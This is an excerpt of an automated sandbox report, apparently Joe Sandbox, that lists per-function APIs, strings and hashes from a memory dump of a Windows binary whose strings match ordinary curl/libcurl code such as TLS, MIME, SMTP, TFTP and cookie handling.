                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 96fec795f57af15035906b9239b6bf51faa52965cd0587616b73b9fdff939964
                                    • Instruction ID: 8384ca2d95baa6faa49a17ba94112af8df4d8d05ee5c2d44e4436451fd05e7e3
                                    • Opcode Fuzzy Hash: 96fec795f57af15035906b9239b6bf51faa52965cd0587616b73b9fdff939964
                                    • Instruction Fuzzy Hash: 1AB1F831714A16EFDB0D6F35FC545A9FBA2FF48351B14952AD41AA3262CFB43C248B90
                                    Function 00E45AA0 Relevance: 31.9, APIs: 2, Strings: 16, Instructions: 411COMMON
                                    Download Yara Rule
                                    Strings
                                    • schannel: can't renegotiate, encrypted data available, xrefs: 00E45ED1
                                    • schannel: server closed the connection, xrefs: 00E45EE5
                                    • schannel: renegotiating SSL/TLS connection, xrefs: 00E45DE5
                                    • schannel: failed to read data from server: %s, xrefs: 00E45E8D
                                    • schannel: server indicated shutdown in a prior call, xrefs: 00E45B4A
                                    • schannel: can't renegotiate, an error is pending, xrefs: 00E45EB7
                                    • schannel: unable to re-allocate memory, xrefs: 00E45BB8, 00E45EA1
                                    • schannel: an unrecoverable error occurred in a prior call, xrefs: 00E45B33
                                    • schannel: server closed abruptly (missing close_notify), xrefs: 00E45F34
                                    • schannel: Curl_read_plain returned error %d, xrefs: 00E45C1F
                                    • schannel: failed to decrypt data, need more data, xrefs: 00E45E6D
                                    • schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 00E45C0F
                                    • schannel: renegotiation failed, xrefs: 00E45EC1
                                    • schannel: remote party requests renegotiation, xrefs: 00E45DBC
                                    • schannel: enough decrypted data is already available, xrefs: 00E45B18
                                    • schannel: SSL/TLS connection renegotiated, xrefs: 00E45E33
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                    • API String ID: 0-3083360527
                                    • Opcode ID: a4eaabe086bba143da38e4545d23c5b7e06d0ffdd267182d296bd06fa2829826
                                    • Instruction ID: c887cefa2d76eadb8694b685085497ad3fc2d69744f5e6359c7708b3d405250c
                                    • Opcode Fuzzy Hash: a4eaabe086bba143da38e4545d23c5b7e06d0ffdd267182d296bd06fa2829826
                                    • Instruction Fuzzy Hash: E4F1A672A08B02AFDB28CF14E845A6AB7E4FF48314F14552DF489B7642D771E854CF86
                                    Function 00E2AAC7 Relevance: 31.8, APIs: 5, Strings: 13, Instructions: 339COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2AB92
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2AC3A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2AC4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2ACD1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2ACE6
                                    Strings
                                    • %zx%s, xrefs: 00E2AE06
                                    • Malformatted trailing header, skipping trailer, xrefs: 00E2ABDD
                                    • Signaling end of chunked upload via terminating chunk., xrefs: 00E2AE65
                                    • Moving trailers state machine from initialized to sending., xrefs: 00E2AB00
                                    • hv, xrefs: 00E2AB7C
                                    • read function returned funny value, xrefs: 00E2ADA9
                                    • Read callback asked for PAUSE when not supported, xrefs: 00E2AD69
                                    • operation aborted by callback, xrefs: 00E2AD40
                                    • operation aborted by trailing headers callback, xrefs: 00E2AC95
                                    • *, xrefs: 00E2ACA5
                                    • Signaling end of chunked upload after trailers., xrefs: 00E2AF0B
                                    • Successfully compiled trailers., xrefs: 00E2AC11
                                    • hv, xrefs: 00E2ADD1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr
                                    • String ID: %zx%s$*$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$hv$hv$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                    • API String ID: 622630536-2435943033
                                    • Opcode ID: 9252ce6714e69423cd37a8e11d503c7407601b94a9c1c42af7c01b0ee41c40fb
                                    • Instruction ID: c2297812e6015968a7dc9bd89e45a526c0d3bb6e1a519c616d948ca4a0506401
                                    • Opcode Fuzzy Hash: 9252ce6714e69423cd37a8e11d503c7407601b94a9c1c42af7c01b0ee41c40fb
                                    • Instruction Fuzzy Hash: 9ED1FF32A043158FDF15DF28E891BE97BE1EF88324F285179D809BB296CB745C45CBA1
                                    Function 00E0EEAB Relevance: 31.8, APIs: 6, Strings: 15, Instructions: 263COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F06B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F0B1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F0F7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F13D
                                      • Part of subcall function 00E0EEAB: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F1C0
                                      • Part of subcall function 00E0E9EB: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 00E0EA46
                                    Strings
                                    • curl_mime_filename(part%d, "%s");, xrefs: 00E0F0D4
                                    • curl_mime_filedata(part%d, "%s");, xrefs: 00E0EF8D
                                    • curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 00E0EFF3
                                    • curl_mime_filename(part%d, NULL);, xrefs: 00E0EFBE
                                    • part%d = curl_mime_addpart(mime%d);, xrefs: 00E0EEE9
                                    • curl_mime_name(part%d, "%s");, xrefs: 00E0F11A
                                    • mime%d = NULL;, xrefs: 00E0F048
                                    • curl_mime_subparts(part%d, mime%d);, xrefs: 00E0F029
                                    • Pl, xrefs: 00E0EF35
                                    • curl_mime_encoder(part%d, "%s");, xrefs: 00E0F08E
                                    • curl_mime_type(part%d, "%s");, xrefs: 00E0F160
                                    • slist%d = NULL;, xrefs: 00E0F1AF
                                    • curl_mime_headers(part%d, slist%d, 1);, xrefs: 00E0F198
                                    • (curl_seek_callback) fseek, NULL, stdin);, xrefs: 00E0EF61
                                    • curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 00E0EF45
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID: (curl_seek_callback) fseek, NULL, stdin);$Pl$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
                                    • API String ID: 2190258309-1036195276
                                    • Opcode ID: d9d50208538d7578cc33a8a68f2c6b9f84b672a0298f692051e72fcfaa428643
                                    • Instruction ID: f5c0318d0389abf6f98e01e8b7439b9a3e053075dca30a0b6e71a7994d4d4d94
                                    • Opcode Fuzzy Hash: d9d50208538d7578cc33a8a68f2c6b9f84b672a0298f692051e72fcfaa428643
                                    • Instruction Fuzzy Hash: DC811737985311FBCB365AA4EC4296E33A09B41770B286665FD34B77D6EF308E918340
                                    Function 00E43BB5 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 134COMMON
                                    Download Yara Rule
                                    APIs
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43BC3
                                    • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00E43BE1
                                    • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,LocalMachine,00000000), ref: 00E43C00
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43CC8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _mbschr_mbsnbcmp
                                    • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
                                    • API String ID: 866314863-3209074899
                                    • Opcode ID: 43e1430b31ce4337e689a758b5a1959efe83d7f5482c3344edb8bfe651b84ca6
                                    • Instruction ID: 70f32e4a67818e4c7b5cf76a850267fe2c5ab7fa316d0b53c0a9674baf33ca8e
                                    • Opcode Fuzzy Hash: 43e1430b31ce4337e689a758b5a1959efe83d7f5482c3344edb8bfe651b84ca6
                                    • Instruction Fuzzy Hash: BA41F235644302AFEB145F36BC85B2BBBACEF40789F245029F905B2257E7708A089B61
                                    Function 00E1649E Relevance: 30.2, APIs: 15, Strings: 2, Instructions: 462COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $%%%02x
                                    • API String ID: 0-2848173732
                                    • Opcode ID: ae786c57e39b6bcc3ccd7875d6a55b3946744e1d9c3788fe84d543e711816067
                                    • Instruction ID: 0669d226b22fab16e1e0bf852a4f599cb12bba972fffd582a3cb05251dd8f9e0
                                    • Opcode Fuzzy Hash: ae786c57e39b6bcc3ccd7875d6a55b3946744e1d9c3788fe84d543e711816067
                                    • Instruction Fuzzy Hash: 89F14631E04645DFCF188F24E8506FDBBB2AF45358F24A46ED842B7291DB749D89CB90
                                    Function 00E10637 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 210COMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000078,00000000,?,?,?,?,00E0D002), ref: 00E10658
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000025,00000000,?,?,?,00E0D002), ref: 00E10699
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfputc
                                    • String ID: %header{$curl: unknown --write-out variable: '%s'$header{
                                    • API String ID: 2340846889-221383536
                                    • Opcode ID: d70319bb434dda1fa326a2f87742407917115e1002467a208efca587de982418
                                    • Instruction ID: 362d6adb83e06f1fbc3f23cb7cf10b04585443be4e4531f18a80ee8128993501
                                    • Opcode Fuzzy Hash: d70319bb434dda1fa326a2f87742407917115e1002467a208efca587de982418
                                    • Instruction Fuzzy Hash: 2E51AB31908340EFEB285F65AC19BFB3BB4DF4175AF28204AE849BB1D1D6E198C4C791
                                    Function 00E376AF Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 176stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E37789
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E377FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strtol
                                    • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                    • API String ID: 76114499-360479797
                                    • Opcode ID: 666464820d4b2d7e01c4bcb27582c3f7d49c45a15df1451a2756e3e708369a53
                                    • Instruction ID: b7ca1882225bb07c5fd794553764693a2ecc9d77f943b35dc5dbd85ca01d7a7f
                                    • Opcode Fuzzy Hash: 666464820d4b2d7e01c4bcb27582c3f7d49c45a15df1451a2756e3e708369a53
                                    • Instruction Fuzzy Hash: 06516DB1F48310BBDB289A249C4EEBE3BB9DF85748F106469E845B7281E6704D01C7A0
                                    Function 00E4EE09 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 170fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,000001B8,?), ref: 00E4EE3F
                                    • GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00E4EEC6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4EED1
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EF3A
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 00E4EF76
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00E4EFC1
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F006
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,000001B8,?), ref: 00E4EE50
                                      • Part of subcall function 00E1A1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1AB
                                      • Part of subcall function 00E1A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1B3
                                      • Part of subcall function 00E1A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1E9
                                      • Part of subcall function 00E1A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1F6
                                      • Part of subcall function 00E1A1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1FE
                                      • Part of subcall function 00E1A1A0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A209
                                    • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,000001B8,?), ref: 00E4EE8F
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4EEA1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EFDB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E4EFE9
                                    Strings
                                    • schannel: invalid path name for CA file '%s': %s, xrefs: 00E4EE66
                                    • schannel: failed to read from CA file '%s': %s, xrefs: 00E4F021
                                    • schannel: failed to open CA file '%s': %s, xrefs: 00E4EEB7
                                    • schannel: CA file exceeds max size of %u bytes, xrefs: 00E4EF18
                                    • schannel: failed to determine size of CA file '%s': %s, xrefs: 00E4EEE7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast$File_errno$free$CloseCreateHandleReadSize_strdupmalloc
                                    • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                                    • API String ID: 1064901726-3430970913
                                    • Opcode ID: f60db99ee0fe573911366eb28740bc81526abe9e81f4d1fe729b8bb000e47123
                                    • Instruction ID: 6f46cc4d9c8a16df130902943f5ec9575ee95b4a2e342aa5b247574e79c7ea60
                                    • Opcode Fuzzy Hash: f60db99ee0fe573911366eb28740bc81526abe9e81f4d1fe729b8bb000e47123
                                    • Instruction Fuzzy Hash: 1451D671A40718AFDB285B25EC06BEE77B9FB48311F1015A5F509B6281DBB06E848F90
                                    Function 00E36179 Relevance: 28.9, APIs: 10, Strings: 9, Instructions: 363COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3623D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E362C2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3634C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36382
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36484
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3649E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E364B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: AUTH=$ SIZE=$ SMTPUTF8$%I64d$<%s>$<%s@%s>$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0
                                    • API String ID: 1294909896-2994854565
                                    • Opcode ID: 10691250970075880eb8733b0c9d97defc2454ec02b45b10ecb7972c25a2ca38
                                    • Instruction ID: 4296667926c1881b7e951fbb5d43e037fe3fe1c4f7b758bfe1549618e49a0b14
                                    • Opcode Fuzzy Hash: 10691250970075880eb8733b0c9d97defc2454ec02b45b10ecb7972c25a2ca38
                                    • Instruction Fuzzy Hash: 4CC12F31A08216EFDB149B74AC589AEBFF4FF44358F24E16AE844B7251DB70AD04CB90
                                    Function 00E13FAE Relevance: 28.8, APIs: 2, Strings: 17, Instructions: 321COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E141F8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1420C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                    • API String ID: 1294909896-1595554923
                                    • Opcode ID: c1a6866fe8b678ff4e19ecf3421d9ac81fafd232e899f07060e78fec73e77ccc
                                    • Instruction ID: 7c35112b83455c498c7de160644455800214bd64cba884a8dc07cdcc2231a14f
                                    • Opcode Fuzzy Hash: c1a6866fe8b678ff4e19ecf3421d9ac81fafd232e899f07060e78fec73e77ccc
                                    • Instruction Fuzzy Hash: F7B19FB1B00606EBDB188A6AD4916EA77A5BF88359F14A03DE905F7790D770EDD0CB80
                                    Function 00E3E107 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 291COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E12813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E12848
                                    • _strrchr.LIBCMT ref: 00E3E194
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00E3E1C3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E1E3
                                    Strings
                                    • Request has same path as previous transfer, xrefs: 00E3E41F
                                    • Uploading to a URL without a file name, xrefs: 00E3E380
                                    • path contains control characters, xrefs: 00E3E154
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strrchrcallocfreemalloc
                                    • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                                    • API String ID: 2159935718-4131979473
                                    • Opcode ID: b2dc6c22fcf28f211c5b5aaf9e44224d113e6b70fa6362eeae49d4b2cb160dd5
                                    • Instruction ID: e9161fb4c7819b12ca1330e03bae13a0c6f5ae515fdbc0f386f83d1c9af7c0ad
                                    • Opcode Fuzzy Hash: b2dc6c22fcf28f211c5b5aaf9e44224d113e6b70fa6362eeae49d4b2cb160dd5
                                    • Instruction Fuzzy Hash: 29A1D071A082069FDB188F68A858ABEBFF4EF49354F14406EE856F7391DB71AC04CB54
                                    Function 00E20F34 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E1FA05: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,?,00E2128E,?,?,00E20F71,00000000,?,00000001), ref: 00E1FA12
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,00E2128E,?), ref: 00E20F81
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00E56C58,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,00E2128E), ref: 00E20FD2
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.,00000000,?,?,?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50), ref: 00E20FED
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2101B
